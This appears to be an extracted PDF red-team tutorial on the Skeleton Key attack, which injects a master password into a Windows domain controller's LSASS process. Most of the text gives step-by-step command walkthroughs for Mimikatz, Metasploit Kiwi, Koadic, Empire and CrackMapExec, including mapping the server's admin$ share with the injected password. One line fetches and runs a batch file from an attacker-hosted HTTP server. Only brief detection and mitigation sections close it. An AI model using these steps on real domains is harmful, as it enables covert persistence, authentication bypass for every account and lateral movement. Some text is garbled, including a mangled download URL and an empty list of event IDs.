Contents

Introduction.......................................................................................3
Introduction to Windows Authentication......................................................... 3
Skeleton Key and Authentication ..................................................................... 3
Working of Skeleton Key .................................................................................. 3
Skeleton Key and Red Teaming ........................................................................ 3
Pre-Requirements for the Attack ..................................................................... 3
Scenarios ......................................................................................................... 3
Configurations used in Practical .........................................................4
Physical Access ..................................................................................4
Mimikatz ...........................................................................................4
Injecting Key .................................................................................................... 4
Accessing Server Directories ............................................................................ 5
Remote Access ...................................................................................7
Metasploit Kiwi Module .....................................................................7
Koadic................................................................................................8
Empire ............................................................................................. 10
CrackMapExec ................................................................................. 13
Detection ......................................................................................... 13
Mitigation ........................................................................................ 14

Page 2 of 14
Introduction
Introduction to Windows Authentication
Microsoft Windows uses two distinct packages in a network for authentication.

 NTLM
 Kerberos
These authentication packages are enclosed in Dynamic Link Libraries (DLLs), which are loaded into the
Local Security Authority Subsystem Service (LSASS) process and client processes. In these two standard
authentication packages, two authentication protocols are implemented. Kerberos authentication is
implemented in the Kerberos authentication package, and NTLM authentication is implemented in the
MSV1_0 authentication package.

Skeleton Key and Authentication

The Skeleton Key attack tampers with both the authentication methods. During NTLM authentication, the
hash of the master password that is injected in the LASS process will not be matched with the SAM
database. However, it will be matched with the Skeleton Key hash. Therefore, completing the
authentication The Kerberos encryption will also be downgraded to an algorithm that doesn’t support salt
(RC4_HMAC_MD5) and the hash retrieved from the active directory will be replaced with the Skeleton
Key hash. The master password hash will be validated server-side. This will lead to successful
authentication for Kerberos and NTLM methods.

Working of Skeleton Key

This Skeleton Key injects itself into LSASS and creates a master password that will work for any account in
the domain. After injecting, the attacker can use the Skeleton Key password configured at the time of
deployment to log in as any domain user. Real users will still be able to log in using their original
passwords. This authentication bypass applies to all services that use single-factor AD authentication, such
as webmail and VPNs, and it also allows an attacker with physical access of the compromised system to
gain control over the system by entering the injected password physically.

Skeleton Key and Red Teaming

The Skeleton Key is a post-exploitation technique that can be used by the Red Teams to access the hosts
and network resources without the need to crack any domain users' passwords. The skeleton is used to
perform lateral movement after getting the initial foothold in the target network and/or systems.
Normally, to achieve persistency, malware needs to write something to Disk. The disk is much more
exposed to scrutiny. DC is critical for normal network operations, thus (rarely booted). Therefore, DC
resident malware like the skeleton key can be diskless and persistent. Benjamin Delpy implemented the
technique that the malware uses inside Mimikatz.

Pre-Requirements for the Attack

To perform this attack, the attacker should have Domain Admin rights. Rebooting a domain controller
will remove this malware, and it will have to be redeployed by the attacker.

Scenarios
Let’s talk scenarios. We are going to look at 2 scenarios in general. The first one will be if we have physical
access to the clients in the network. Next, we will comprise one of the clients and then inject the skeleton
key remotely into the server.

Page 3 of 14
Configurations used in Practical
Attacker:
OS: Kali Linux 2020.1
Target:
Server OS: Windows Server 2016
Client OS: Windows 10

Physical Access
Since we are assuming the physical access of the client, the injecting skeleton key is quite similar. We are
just trying to explain the workings of the skeleton key. Scenarios can vary in the real world due to an
unexhaustive list of variables that can factor in the real world.

Mimikatz
There is a DLL file for injecting the skeleton key into memory, but we have the Mimikatz, which can do
this quickly.

Injecting Key
We run the Mimikatz executable x64 version with Administrator privileges on the client system directly.
This can be done by right-clicking on the Mimikatz executable and choosing the "Run as Administrator"
option from the drop-down menu. It will ask for the credentials of the administrator. Enter the credentials.
Then we will see that we have the Mimikatz launched. First, we will debug the privilege. We get the OK
message, which means we are clear to move ahead. The Skeleton Key was kept in the Misc modules of
Mimikatz. We will inject the skeleton key into the memory using the commands shown in the image given.
From the OK messages, we can be sure that we have completed the task successfully.

privilege::debug
misc::skeleton

Page 4 of 14
Accessing Server Directories
Now that we have injected the skeleton key, the server should be accessible to us using the "mimikatz"
password. There is a long list of things that we can do from here. But to prove that point, we will just take
a peek at the directories of the server. Fortunately, we only need one command to accomplish this: "net
use."

net use R: \\WIN-S0V7KMTVLD2\admin$ /user:Administrator mimikatz

As soon as we run the previous command, we can see that we have one new drive in the Network
Locations. It has the same letter that we mentioned in the command above. Let’s take a peek inside it.

Page 5 of 14
This is the directory from which the Windows Server. We have all the services and files from the server
accessible on the client machine.

This concludes this scenario. Again, there are a variety of things that can be done now that we have a
skeleton injected in the Sever. This is just a convenient example.

Page 6 of 14
Remote Access
Time to move on to the scenario where we have remote access to the server and one of the clients in
the network. We are going to use the three most prominent frameworks for the attack.

1. Metasploit
2. Koadic
3. Empire

Metasploit Kiwi Module

First, we will be using the Metasploit Framework. We compromise the system and gain a meterpreter
session on DC. After gaining access to the meterpreter session, we load the kiwi module into the session.
This gives us the ability to perform the mimikatz commands directly from the meterpreter. We use the
kiwi_cmd command to execute the skeleton injection command into the Sever.

load kiwi
kiwi_cmd misc::skeleton

The work on the server is done. Now it’s time to compromise with the client. After gaining the
meterpreter, we run the shell command. Again, to demonstrate the successful injection of the skeleton
key, we will be using the net use command to gain access to the server directory. This time we named the
disk Y. After executing the net use command, we pop up a PowerShell instance to access the new shared
drive. Now, this sounds weird, but we tried to access the directory using the cmd prompt, but it was not
accessible here. Still, we can see that the contents of the Server Directory are accessible here using the
password "mimikatz".

shell
powershell
net use Y: \\WIN-S0V7KMTVLD2\admin$ /user:Administrator mimikatz
cd Y:\
dir

Page 7 of 14
Koadic
Meterpreter is the basic approach. Koadic is a modern one. We gain access to the session on the server
once again. This time we will be using the Koadic implant to inject the skeleton key. After gaining a session,
we select the implant with the use command. "mimikatz_dynwrapx" is the name of the implant we intend
to use.It gives us similar functionality as the meterpreter Kiwi. We ran the command misc:: skeleton with
the help of the MIMICMD function. It injected the skeleton into the server in no time.

use mimikatz_dynwrapx
set MIMICMD misc::skeleton
execute

Page 8 of 14
Now that we have successfully injected the skeleton key into the memory of the server, we proceed
towards gaining the session on one of the client machines. After we got the session, we needed to run the
net use command to get access to the server directories. As it’s a Windows native command, we needed
to use the exec_cmd implant to execute this command. We can see in the image given below that the
implant has shown the reply saying that the command was completed successfully.

use implant/manage/exec_cmd
set CMD net use Y: \\WIN-S0V7KMTVLD2\admin$ /user:Administrator mimikatz
execute

Now we need to take a peek into the newly accessible Drive Y. Again, we use the same implant with the
dir command set to it. This gave us the list of files in the directory hosted on the server. This was possible
using the password 'mimikatz'.

set CMD dir Y:\

execute

Page 9 of 14
Empire
Two of the frameworks for our agenda are down. Now we turn to the Empire. While working with this
framework, we ran into a hiccup. We will talk about it later. But we start by gaining access to the server
on Empire.
After having an active agent, we selected the skeleton_key module to inject the skeleton key into the
memory of the server. It doesn’t require any twerking. So, we just executed it right off the bat. It was a
pretty sweet deal. It ran for a few seconds before giving the message that the skeleton key was implanted.
We can use the mimikatz as a password to access the server.

usemodule persistence/misc/skeleton_key*
execute

Page 10 of 14
This concludes the server business. Now we move to the client machine. We gain a session on the client
machine using Empire. Now to the hiccup we mentioned. There were a whole bunch of issues running the
net use command from the Empire shell. This led us to think outside the box, and we just created a batch
file named netuse.bat and wrote the net use command that we wanted to execute on the client machine.
It can be observed that the password used to access the server is 'mimikatz'.

cat netuse.bat

Then we threw this batch file to the client machine. This can be done by creating an http server using
Python One Liner and using the wget command on the client machine to download the batch file. Then
we ran this batch file on the target machine. This ran successfully and gave us access to the server
directory posed as R:\. We used the dir command to take a peek into it. This is indeed the server directory.
This concludes this demonstration of skeleton keys on Windows Server using different methods.

Page 11 of 14
 shell wget http://192.168.1.112:8000/netuse.bat -outfile netuse.bat
shell .\netuse.bat
shell dir R:\

We broke the security now its time to detect and mitigate this threat.

Page 12 of 14
CrackMapExec
Since all the basic methods are over. Now its time to shine the light on this very fast and convenient tool
that can be used to inject the skeleton remotely onto a Domain Controller.
The usage of this CrackMapExec is quite simple. You install it using a simple apt install and its good to go.
It requires a bunch of things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u '[Username]' -p '[Password]' -M mimikatz -o
COMMAND='misc::skeleton'

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' -M mimikatz -o

COMMAND='misc::skeleton'

Read More: Lateral Moment on Active Directory: CrackMapExec

Detection
The Skeleton Key is not transmitted over the network traffic. Hence, Network-based Intrusion Detection
and Intrusion Prevention Systems (IDS/IPS) will not detect this threat.
Skeleton Key has been detected as a 64-bit DLL file with the following file names:

 msuta64.dll
 ole.dll
 ole64.dll

Page 13 of 14
Active Directory Domain Controllers may experience replication issues. This kind of issue leads users to
contact the Microsoft Technical Staff. The suggestion they provided was to actually "reboot" the server.
This, in turn, led to the skeleton key being removed from the memory altogether.
An attacker can use PsExec to perform to create different services. This could lead to the creation of logs
at the Windows Service Control Manager log. We can use the SIEM to log events from key servers, like
domain controllers, and alerting on the unauthorized use of domain administrator credentials may help
in identifying the attacker activity.
Maintain a process creation audit trail on all workstations and servers. This may lead to the detection of
Skeleton Key deployments. Be on the lookout for unexpected PsExec.exe or rundll32.exe processes and
the running of PsExec.exe with the “-accepteula” parameter.
Also, be on the lookout for the following event IDs:

Mitigation
 Enable the Multi-factor authentication for all remote access applications.
 Reduce the amount of Domain Admins accounts in your Network.
 Ensure Domain Admins cannot logon to lesser privileged machines where their hashes may be
subject to be compromised by attackers.
 Prevent untrusted code from running on Domain Controllers.

References

 MITRE ATT&CK
 Dell Secureworks
 Microsoft Kerberos Authentication Overview
 Microsoft NTLM

Page 14 of 14